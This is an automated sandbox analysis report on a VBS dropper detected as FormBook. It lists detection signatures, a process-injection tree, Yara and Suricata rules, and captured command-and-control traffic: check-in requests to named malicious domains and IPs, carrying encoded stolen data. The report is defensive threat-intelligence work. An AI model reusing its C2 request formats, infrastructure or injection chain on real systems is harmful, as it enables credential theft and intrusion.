Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0CkEHZjZgO.vbs

Overview

General Information

Sample name:0CkEHZjZgO.vbs
renamed because original name is a hash value
Original sample name:479fe21d1995faa9e2f152dfae09e949.vbs
Analysis ID:1554308
MD5:479fe21d1995faa9e2f152dfae09e949
SHA1:dddd6e905fc5d63c79f4c58b47f1333ada7939e5
SHA256:4a9154e1accebc00701886ac29a82e973abbbf4141ec9b4af5f505d1b4da0e36
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • wscript.exe (PID: 3284 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • temp_file_rhjRS.exe (PID: 3384 cmdline: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" MD5: E4CD22AA149644D6606290EBF0375D67)
      • RegAsm.exe (PID: 3408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
        • LHXJJggpVplOZ.exe (PID: 312 cmdline: "C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • gpupdate.exe (PID: 3532 cmdline: "C:\Windows\SysWOW64\gpupdate.exe" MD5: 37A4FA8BFAC3778EE35C1362FB1A6175)
            • LHXJJggpVplOZ.exe (PID: 1720 cmdline: "C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 3780 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x54878:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x3c927:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16542:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs", ProcessId: 3284, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0CkEHZjZgO.vbs", ProcessId: 3284, ProcessName: wscript.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\gpupdate.exe, ProcessId: 3532, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-12T11:19:42.434600+010020507451Malware Command and Control Activity Detected192.168.2.2249165208.91.197.2780TCP
            2024-11-12T11:20:21.039977+010020507451Malware Command and Control Activity Detected192.168.2.224917015.197.148.3380TCP
            2024-11-12T11:20:34.481167+010020507451Malware Command and Control Activity Detected192.168.2.2249174162.213.249.21680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-12T11:19:42.434600+010028554651A Network Trojan was detected192.168.2.2249165208.91.197.2780TCP
            2024-11-12T11:20:21.039977+010028554651A Network Trojan was detected192.168.2.224917015.197.148.3380TCP
            2024-11-12T11:20:34.481167+010028554651A Network Trojan was detected192.168.2.2249174162.213.249.21680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-12T11:19:57.548221+010028554641A Network Trojan was detected192.168.2.224916715.197.148.3380TCP
            2024-11-12T11:20:00.711578+010028554641A Network Trojan was detected192.168.2.224916815.197.148.3380TCP
            2024-11-12T11:20:02.631880+010028554641A Network Trojan was detected192.168.2.224916915.197.148.3380TCP
            2024-11-12T11:20:26.150213+010028554641A Network Trojan was detected192.168.2.2249171162.213.249.21680TCP
            2024-11-12T11:20:29.407500+010028554641A Network Trojan was detected192.168.2.2249172162.213.249.21680TCP
            2024-11-12T11:20:31.227335+010028554641A Network Trojan was detected192.168.2.2249173162.213.249.21680TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.495055072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.639170601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.554604259.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639241553.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.495043651.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639223154.0000000000450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.639336446.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.639051770.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.495204782.0000000005700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeJoe Sandbox ML: detected
            Source: Binary string: wntdll.pdb source: RegAsm.exe

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49174 -> 162.213.249.216:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49174 -> 162.213.249.216:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49170 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 15.197.148.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 162.213.249.216:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 162.213.249.216:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49165 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 162.213.249.216:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49165 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 15.197.148.33:80
            Performs DNS queries to domains with low reputation
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeDNS query: www.vasehub.xyz
            Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: C:\Windows\SysWOW64\gpupdate.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3320000[1].zipJump to behavior
            Source: global trafficHTTP traffic detected: GET /757p/?3VXDE=Ef/fEwz7M+sd6DpHwM43OJi57430VLhD3GIDM36QPdL4P0LchFUI8u/fJBYoMgu0o7JVWIxPRGxhpYLP1YXy3Xv4ifrcOfVL+pZNAtC/uDJJAA/bvm88hS2+dRm+&XJNx=abrdnJXXqdPhC HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kevin-torkelson.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2020/sqlite-dll-win32-x86-3320000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /fksk/?3VXDE=Da/YB3Khdl1nHqF+sXSftOGWFPDcK1D40N3MmeZhH+yFl3LdN7J6XJQSvkWEDqgMgq2RkLMqt/sISVLUgAiTepatAcdQK/RR2laDsmCNg7CjeO0+DkiAxRGVn1KL&XJNx=abrdnJXXqdPhC HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.myjiorooms.servicesConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /uzgu/?XJNx=abrdnJXXqdPhC&3VXDE=F29dws9Qm3zXdw7iB9oHSn/dthoKXPcyF5IHcXQEgDtq40lW8Cn3ziqNmynmRVOjEauFGJXilSJYjlEXJuVGqPsSKTedUmHvSAt7JfIiTnbOkuaAQxhGe3GDHkQu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.vasehub.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.kevin-torkelson.info
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.myjiorooms.services
            Source: global trafficDNS traffic detected: DNS query: www.vasehub.xyz
            Source: unknownHTTP traffic detected: POST /fksk/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.myjiorooms.servicesOrigin: http://www.myjiorooms.servicesReferer: http://www.myjiorooms.services/fksk/Content-Type: application/x-www-form-urlencodedContent-Length: 2162Cache-Control: max-age=0Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Z667T Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36Data Raw: 33 56 58 44 45 3d 4f 59 58 34 43 42 32 6f 66 57 70 41 48 2b 67 37 33 30 50 6c 38 38 50 4d 4e 35 2b 6f 48 6b 75 38 34 4a 43 44 32 49 31 62 52 64 6d 77 69 57 2f 5a 4b 49 46 66 53 4d 34 71 77 55 65 35 41 4a 4d 55 76 64 57 43 6f 38 38 72 37 37 45 51 53 56 6a 42 35 67 65 45 4b 59 7a 67 46 38 56 50 56 61 64 30 67 55 76 38 6d 48 7a 56 73 59 54 66 66 64 77 42 65 6b 69 48 67 42 65 38 6d 6a 6e 6e 4c 54 2b 57 76 43 4a 70 74 74 4c 43 73 49 2f 64 6c 4b 4e 46 32 58 42 39 55 54 69 65 38 6a 47 49 57 4f 2b 43 52 62 54 32 62 6a 4e 52 6b 30 5a 46 37 78 75 41 39 42 67 79 5a 62 61 2f 62 68 48 78 34 47 63 35 61 76 49 58 36 71 64 77 4c 36 41 78 4d 57 36 6e 54 4b 49 59 55 62 2f 39 57 77 69 78 32 38 7a 6c 7a 32 4c 72 4a 58 76 34 64 7a 4b 4b 57 32 32 69 47 43 45 70 34 50 6f 66 4f 37 49 59 64 45 34 62 68 49 49 74 4d 44 64 6e 64 6a 66 66 71 58 78 68 4b 4f 75 4d 62 79 59 42 5a 79 41 43 79 71 39 55 41 62 4b 72 71 70 59 6c 35 74 79 39 39 42 6c 64 35 58 39 73 6b 35 35 4c 50 4e 57 6e 68 47 6b 4a 74 44 53 54 2f 5a 75 6b 6a 39 76 6d 49 33 67 41 79 7a 4e 6f 59 33 58 79 5a 56 45 33 6d 57 31 78 48 61 35 48 45 78 69 76 65 74 51 62 47 46 55 61 4d 52 30 74 63 67 79 4e 62 72 33 6f 6b 4f 42 71 6e 54 78 54 38 54 72 74 42 62 4b 79 42 4a 2f 65 41 6c 67 61 69 32 67 6d 50 54 71 41 44 76 66 63 76 4f 62 47 46 44 52 57 33 37 38 39 4e 46 77 73 64 4a 63 31 53 61 67 32 75 4e 54 51 57 6b 6f 54 6f 42 5a 2b 46 59 38 33 37 49 71 71 6d 47 47 73 53 54 76 4f 68 77 79 6e 6e 48 38 61 64 4b 46 48 37 53 42 5a 65 47 43 49 6e 6b 53 79 50 73 4a 6d 65 68 30 6f 62 35 70 6a 54 4a 50 69 6d 44 2f 56 5a 78 53 50 59 41 6d 74 58 6b 6c 52 7a 75 43 68 4c 45 50 34 57 58 2b 43 74 42 2b 69 70 58 44 4d 65 6e 41 30 46 41 51 61 52 50 44 6b 63 44 72 42 73 79 6b 4e 61 53 37 71 6e 5a 43 30 68 63 36 58 43 51 6e 69 76 70 42 56 6c 64 34 74 69 41 31 44 65 63 41 6f 4c 56 34 79 70 38 5a 52 57 5a 50 30 42 71 6d 4d 5a 65 6b 6c 47 56 53 37 33 46 48 63 4e 4f 47 68 36 71 2f 6c 2f 49 70 64 31 38 57 2f 32 68 4f 59 62 51 62 69 75 42 71 61 62 73 43 34 45 2f 66 77 4b 75 78 32 35 54 70 6a 47 65 43 75 6a 7a 59 65 4d 6a 4d 6b 5a 37 4a 76 42 4a 6f 69 6e 37 6a 4a 35 66 72 33 39 43 78 78 4d 47 73 77 6e 63 74 43 62 69 6d 30 73 4a 64 30 54 39 6e 64 31 77 64 63 7a 66 77 75 50 48 78 6e 50 70 37 73 67 6e 61 64 7a 57 42 47 39 41 33 73 64 74 66 59 76 4c 44 52 4d 35 5a 67 34 69 4b 76 36 6d 74 4b 7a 50 71 39 65 4a 5a 38 45 58 32 49 67 2b 68 72 56 78 31 73 5a 75 4f 6b 57 5a 41 44 71 48 65 45 31 7
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 10:20:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 10:20:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 10:20:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
